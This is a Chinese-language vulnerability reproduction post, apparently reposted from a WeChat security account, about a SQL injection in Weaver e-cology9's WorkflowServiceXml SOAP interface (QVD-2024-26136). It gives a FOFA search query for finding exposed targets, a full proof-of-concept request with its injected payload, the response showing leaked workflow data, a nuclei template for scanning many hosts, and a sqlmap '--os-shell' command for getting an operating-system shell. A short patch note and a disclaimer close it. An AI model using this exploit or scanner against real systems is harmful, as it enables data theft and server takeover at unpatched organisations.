泛微e-cology9 < 10.64.1
泛微E-Cology 是一款协同管理平台,旨在为中大型组织创建全新的高效协同办公环境。身份认证、电子签名、电子签章、数据存证让合同全程数字化。包含流程、门户、知识、人事、沟通、客户、项目、财务等 20多个功能模块。该系统WorkflowServiceXml接口处未对用户输入进行有效过滤,直接将其拼接进了SQL语句中,导致SQL注入漏洞,会导致数据泄露。
app="泛微-OA(e-cology)"
POC数据包,其中payload是1=1 AND 2=2
POST /services/WorkflowServiceXml HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0Content-Length: 422Connection: closeContent-Type: text/xmlAccept-Encoding: gzip<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"><soapenv:Header/><soapenv:Body><web:getHendledWorkflowRequestList><web:in0>1</web:in0><web:in1>1</web:in1><web:in2>1</web:in2><web:in3>1</web:in3><web:in4><web:string>1=1 AND 2=2</web:string></web:in4></web:getHendledWorkflowRequestList></soapenv:Body></soapenv:Envelope>
响应内容如下
HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedCache-Control: privateContent-Type: text/xml; charset=UTF-8Date: Wed, 17 Jul 2024 02:13:44 GMTServer: WVSSet-Cookie: ecology_JSessionid=aaaoDEbNHDKy05HlKOa8y; path=/X-Frame-Options: SAMEORIGINX-Xss-Protection: 1<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:Body><ns1:getHendledWorkflowRequestListResponse xmlns:ns1="http://webservices.workflow.weaver"><ns1:out><ns1:string><WorkflowRequestInfo><requestId>106746</requestId><requestName>~`~`7 会议取消`~`8 The meeting is canceled`~`~:-~`~`7 系统管理员`~`8 system administrator`~`9 系統管理員`~`~-2023-11-15</requestName><requestLevel>0</requestLevel><workflowBaseInfo><workflowId>1</workflowId><workflowName>~`~`7 系统提醒工作流`~`8 System alert workflow`~`9 系統提醒工作流`~`~</workflowName><workflowTypeId></workflowTypeId><workflowTypeName></workflowTypeName></workflowBaseInfo><currentNodeName>~`~`7 提醒`~`8 remind`~`9 提醒`~`~</currentNodeName><currentNodeId>2</currentNodeId><status>~`~`7 提醒`~`8 remind`~`9 提醒`~`~</status><creatorId>1</creatorId><creatorName>~`~`7 系统管理员`~`8 system administrator`~`9 系統管理員`~`~</creatorName><createTime>2023-11-15 09:48:27</createTime><lastOperatorName>~`~`7 系统管理员`~`8 system administrator`~`9 系統管理員`~`~</lastOperatorName><lastOperateTime>2023-11-15 09:48:27</lastOperateTime><receiveTime>2023-11-15 09:48:27</receiveTime><canView>false</canView><canEdit>false</canEdit><mustInputRemark>false</mustInputRemark><needAffirmance>false</needAffirmance></WorkflowRequestInfo></ns1:string></ns1:out></ns1:getHendledWorkflowRequestListResponse></soap:Body></soap:Envelope>
漏洞复现成功
poc文件内容如下
id: QVD-2024-26136info:name: 泛微E-Cology WorkflowServiceXml SQL注入漏洞author: fgzseverity: highdescription: 泛微E-Cology 是一款协同管理平台,旨在为中大型组织创建全新的高效协同办公环境。身份认证、电子签名、电子签章、数据存证让合同全程数字化。包含流程、门户、知识、人事、沟通、客户、项目、财务等 20多个功能模块。该系统WorkflowServiceXml接口处未对用户输入进行有效过滤,直接将其拼接进了SQL语句中,导致SQL注入漏洞,会导致数据泄露。metadata:max-request: 1fofa-query: app="泛微-OA(e-cology)"verified: truerequests:- raw:- |+POST /services/WorkflowServiceXml HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0Content-Type: text/xmlConnection: close<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"><soapenv:Header/><soapenv:Body><web:getHendledWorkflowRequestList><web:in0>1</web:in0><web:in1>1</web:in1><web:in2>1</web:in2><web:in3>1</web:in3><web:in4><web:string>1=1 AND 2=2</web:string></web:in4></web:getHendledWorkflowRequestList></soapenv:Body></soapenv:Envelope>matchers:- type: dsldsl:- "status_code == 200 && contains(body, 'system') && contains(body, 'administrator') && contains(body, '提醒')"
将上述POC数据包写入1.txt
执行
python sqlmap.py -r 1.txt --os-shell
升级到最新版本。
或者下载官方补丁修复漏洞
https://www.weaver.com.cn/cs/securityDownload.html#
~~~少侠点个赞再走~~~
原文始发于微信公众号(AI与网安):QVD-2024-26136 漏洞复现 poc (大范围)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论